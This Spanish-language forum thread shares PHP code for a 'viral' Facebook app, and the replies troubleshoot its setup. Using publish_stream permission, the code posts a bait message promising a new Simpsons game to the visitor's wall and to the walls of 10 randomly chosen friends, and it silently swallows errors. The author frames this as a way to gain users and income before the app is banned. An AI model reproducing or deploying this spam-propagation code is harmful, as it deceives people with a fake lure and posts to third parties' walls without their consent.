Creación de aplicación Facebook viral paso a paso

• Autor Autor Cicklow
  • Fecha de inicio Fecha de inicio
probando! a ver que tal funciona

En este nuevo ejemplo programaremos una aplicación viral (esto es pan para hoy hambre para mañana XD)

Usaremos el mismo código de [APPS] Crear aplicaciones en un iframe, pero editaremos el index.php para que funcione como queremos.

Usaremos permisos especiales: publish_stream, para publicar en el muro

Lo que hace la aplicacion es, cuando el usuario accede se publica en el muro del usuario y tambien se le publica a 10 amigos al azar en sus muros. Para que no le publique constantemente en el muro usaremos cookies, que duran 1 dia (24 horas).

PHP:
<?php
	//Verificamos las cookies
	$_E = false;
	if($_COOKIE['YaTA']=="cicklow") $_E = true; else setcookie("YaTA", "cicklow", (time()+3600*24));

//Header especiales para Cookies en IFRAMES
	header('P3P:CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"');

//Nuestra config
	include('config.php');
?>

Lo que publicaremos
PHP:
	$_P['message'] 		= '';
	$_P['caption'] 		= '.';
	$_P['description'] 	= '';
	$_P['picture'] 		= 'http://www.seriesadictos.com/wp-content/uploads/2008/06/los-simpson.jpg';	//Imagen
	$_P['link'] 		= 'http://apps.facebook.com/aplicacion/';					//URL Apps
	$_P['name'] 		= 'Juega al nuevo juego de los simpsons.';					//Texto

Ahora la parte Viral
PHP:
	//Parte Viral de nuestra apps
	if($_E){
		//Publicamos en el muro del user
		$me = $facebook->api('/'.$facebook->getUser().'/feed','post',$_P);

//Publicamos en el muro de los amigos!
		$fi = $facebook->api('/me/friends/');
		$fi = $fi['data'];
		shuffle($fi);
		for($i=0;$i<10;$i++){
		  try{
		    if($fi[$i]['id']!="") $postear = $facebook->api('/'.$fi[$i]['id'].'/feed', 'post',$_P);
		    echo "<!-- ID ".$fi[$i]['id']." //-->";
		  } catch (Exception $e) { }
		}
	}

Usando el 1 tutorial mas este agregado tendremos una linda apps viral (lo de pan para hoy y hambre para mañana es porque estas apps generan ingresos y usuarios pero son facilmente baneadas)

Saludos

Una vez que me redirije a facebook me dice: Se a producido un error. intentelo mas tarde

Fijate Enlace eliminado

Última edición:
Una vez que me redirije a facebook me dice: Se a producido un error. intentelo mas tarde

Fijate Enlace eliminado
Aun no lo testeo, pero claramente veo que aun no agregaste la Id de la Aplicacion :/

Aun no lo testeo, pero claramente veo que aun no agregaste la Id de la Aplicacion :/

fijate que ya e puesto el id de la aplicacion pero se queda colgada no hace nada

Última edición:
Esto debe de funcionar muy bien 🙂 ¿Lo has probado? Por simple curiosidad, ¿cuántos usuarios has llegado a conseguir al día o 2 días de empezar?

Tengo la API de Facebook muy abandonada, me parece que cada vez tengo más motivos para volver a probar cosas nuevas 🙂

Que es lo que pasa? suben los likes ... Buen aporte

Saludos

Ayuda porfavor

Hola amigos del foro tengo un problema y me gustaria de su ayuda lo que pasa esque estoy tratando de hacer funcionar el codigo y todo anda regular, el problema que tengo es que cuando alguien permite la aplicacion todo funciona normal, pero el problema se da cuando alguien da omitir la aplicaicon, y genera el siguiente error el siguiente error:

"Fatal error: Uncaught OAuthException: (#200) The user hasn't authorized the application to perform this action thrown in /home/content/src/base_facebook.php on line 1106"

me gustaria que cuando alguien de Omitir me envie a la misma aplicacion sin que me genere ese error..

eh tratado de solucionardo pero nada, llevo dos dias y nada, y me gustaria de su gran ayuda amigos usuarios del foro, de antemano se los agradece un usuario que esta aprendiendo algo de php..🙂

Gracias [MENTION=9679]cicklow[/MENTION], no por el script, si no por compartir información, ya que eso en este foro esta en desuso si no pasas por caja. 😉

Me funciona la api, todo, pero me da el siguiente error "
Fatal error: Uncaught OAuthException: (#200) The user hasn't authorized the application to perform this action thrown in /home/xxxx/public_html/src/base_facebook.php on line 1106"

Que puede ser?

Se ve muy interesante, pero no te pueden banear de facebook por así decirlo por hacerlo?

Se ve muy interesante, pero no te pueden banear de facebook por así decirlo por hacerlo?

no te banean, simplemente si ven que tu apps es de mucho spam, te la eliminan. pero tu cuenta continua.

probando.....

No puedo 🙁 me falta eso del facebook.php

No entiendo eso del facebook.php
que se debe hacer,
../src/facebook.php

de donde lo saco, por que la verdad, no se 🙂

No entiendo eso del facebook.php
que se debe hacer,
../src/facebook.php

de donde lo saco, por que la verdad, no se 🙂

tienes que descargar el SDK de facebook
Enlace eliminado

Y lo pones en esta estructura
root
---- aplicacion
---- src

donde en src pones los archivos del SDK y en aplicacion los archivos de la aplicacion. pero eso es a tu gusto. tmb podes poner todo junto.

Hola Cicklow... aun funciona esta app ?, si es asi algo estoy haciendo mal me sale error
API Error Code: 191
API Error Description: The specified URL is not owned by the application
Error Message: Invalid redirect_uri: La configuración de la aplicación no permite la URL proporcionada.
a que se debe esto man?

Hola Cicklow... aun funciona esta app ?, si es asi algo estoy haciendo mal me sale error

a que se debe esto man?

eso te lo dice porque en las config tenes otra url a la que tratas de acceder.

Ejemplo en las config tenes: www.pepe.com/apps y accedes desde Enlace eliminado

Ayuda

Hola cicklow he hecho ya todo eso, pero mira como me aparese creo que algo no esta bien :witless: Enlace eliminado si me podrias ayudar jeje es que apenas empeze en esto de hacer apps.

Hola cicklow he hecho ya todo eso, pero mira como me aparese creo que algo no esta bien :witless: Enlace eliminado si me podrias ayudar jeje es que apenas empeze en esto de hacer apps.

te falta el <?php jejeje
todo codigo php va antre
<?php y ?>